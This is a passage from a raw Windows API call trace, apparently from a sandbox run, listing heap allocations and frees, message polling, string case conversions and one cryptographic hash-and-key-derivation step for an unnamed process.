Size=0x10) returned 0x34aaa48 [0252.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.197] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.198] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.198] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.198] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1858 [0252.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa7f0 [0252.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa48 [0252.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c18 [0252.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa838 [0252.198] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1c18 [0252.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1858 [0252.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaa00 [0252.198] CryptHashData (hHash=0xaa57a0, pbData=0x24b18a8, dwDataLen=0x3, dwFlags=0x1) returned 1 [0252.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x214) returned 0x34a04b0 [0252.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x14) returned 0x2466e10 [0252.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b1708 [0252.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2f8 [0252.198] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa8e0 [0252.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aaad8 [0252.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b18e8 [0252.199] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0252.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x18) returned 0x2466df0 [0252.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0252.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa940 [0252.199] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.199] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1788 [0252.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa6a0 [0252.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa4a8 [0252.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b16b8 [0252.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x20) returned 0x24b6a08 [0252.199] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x4) returned 0x24b13c8 [0252.200] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.200] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0252.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.200] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.200] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.200] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa898 [0252.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa628 [0252.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0252.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa640 [0252.200] CharUpperBuffW (in: lpsz="A0200C03718", cchLength=0xb | out: lpsz="A0200C03718") returned 0xb [0252.200] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.200] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0252.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.201] CharUpperBuffW (in: lpsz="SSA0200C03718", cchLength=0xd | out: lpsz="SSA0200C03718") returned 0xd [0252.201] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.201] PeekMessageW (in: lpMsg=0x8bef60, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef60) returned 0 [0252.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b13c8 [0252.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1728 [0252.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa568 [0252.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0252.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b1c28 [0252.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa550 [0252.201] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.201] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa418 [0252.201] CryptDeriveKey (in: hProv=0xad31c0, Algid=0x6601, hBaseData=0xaa57a0, dwFlags=0x1, phKey=0x8bef50 | out: phKey=0x8bef50*=0xaa5920) returned 1 [0252.201] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7f0 | out: hHeap=0x25c0000) returned 1 [0252.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa808 | out: hHeap=0x25c0000) returned 1 [0252.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5f8 | out: hHeap=0x25c0000) returned 1 [0252.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa00 | out: hHeap=0x25c0000) returned 1 [0252.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa478 | out: hHeap=0x25c0000) returned 1 [0252.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa430 | out: hHeap=0x25c0000) returned 1 [0252.202] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1908 | out: hHeap=0x25c0000) returned 1 [0252.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa358 | out: hHeap=0x25c0000) returned 1 [0252.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1728 | out: hHeap=0x25c0000) returned 1 [0252.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1c28 | out: hHeap=0x25c0000) returned 1 [0252.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1428 | out: hHeap=0x25c0000) returned 1 [0252.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16c8 | out: hHeap=0x25c0000) returned 1 [0252.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa898 | out: hHeap=0x25c0000) returned 1 [0252.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa940 | out: hHeap=0x25c0000) returned 1 [0252.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa640 | out: hHeap=0x25c0000) returned 1 [0252.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.203] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa568 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa448 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa550 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3d0 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa3e8 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa388 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa78 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaf0 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa48 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d8e8 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2f8 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8e0 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa778 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x249f1a0 | out: hHeap=0x25c0000) returned 1 [0252.204] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466db0 | out: hHeap=0x25c0000) returned 1 [0252.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a0288 | out: hHeap=0x25c0000) returned 1 [0252.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34a04b0 | out: hHeap=0x25c0000) returned 1 [0252.205] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1858 | out: hHeap=0x25c0000) returned 1 [0252.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16b8 | out: hHeap=0x25c0000) returned 1 [0252.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1788 | out: hHeap=0x25c0000) returned 1 [0252.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.205] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d8a0 | out: hHeap=0x25c0000) returned 1 [0252.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaad8 | out: hHeap=0x25c0000) returned 1 [0252.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aab68 | out: hHeap=0x25c0000) returned 1 [0252.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.206] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa8b0 | out: hHeap=0x25c0000) returned 1 [0252.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa508 | out: hHeap=0x25c0000) returned 1 [0252.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.206] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.207] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.207] PeekMessageW (in: lpMsg=0x8bf3c0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf3c0) returned 0 [0252.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa7a8 | out: hHeap=0x25c0000) returned 1 [0252.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa910 | out: hHeap=0x25c0000) returned 1 [0252.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x2466e10 | out: hHeap=0x25c0000) returned 1 [0252.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaaa8 | out: hHeap=0x25c0000) returned 1 [0252.207] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.207] CharUpperBuffW (in: lpsz="A5000A03A10", cchLength=0xb | out: lpsz="A5000A03A10") returned 0xb [0252.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.208] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0252.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.208] CharUpperBuffW (in: lpsz="SSA5000A03A10", cchLength=0xd | out: lpsz="SSA5000A03A10") returned 0xd [0252.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b6a08 | out: hHeap=0x25c0000) returned 1 [0252.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.208] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0252.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d7e0 | out: hHeap=0x25c0000) returned 1 [0252.208] PeekMessageW (in: lpMsg=0x8bef48, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bef48) returned 0 [0252.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b18e8 | out: hHeap=0x25c0000) returned 1 [0252.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa628 | out: hHeap=0x25c0000) returned 1 [0252.208] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aaa60 | out: hHeap=0x25c0000) returned 1 [0252.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa5c8 | out: hHeap=0x25c0000) returned 1 [0252.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x248d930 | out: hHeap=0x25c0000) returned 1 [0252.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa6a0 | out: hHeap=0x25c0000) returned 1 [0252.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa688 | out: hHeap=0x25c0000) returned 1 [0252.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b17b8 | out: hHeap=0x25c0000) returned 1 [0252.209] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0252.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa4a8 | out: hHeap=0x25c0000) returned 1 [0252.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b16f8 | out: hHeap=0x25c0000) returned 1 [0252.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa838 | out: hHeap=0x25c0000) returned 1 [0252.209] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b1708 | out: hHeap=0x25c0000) returned 1 [0252.210] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, 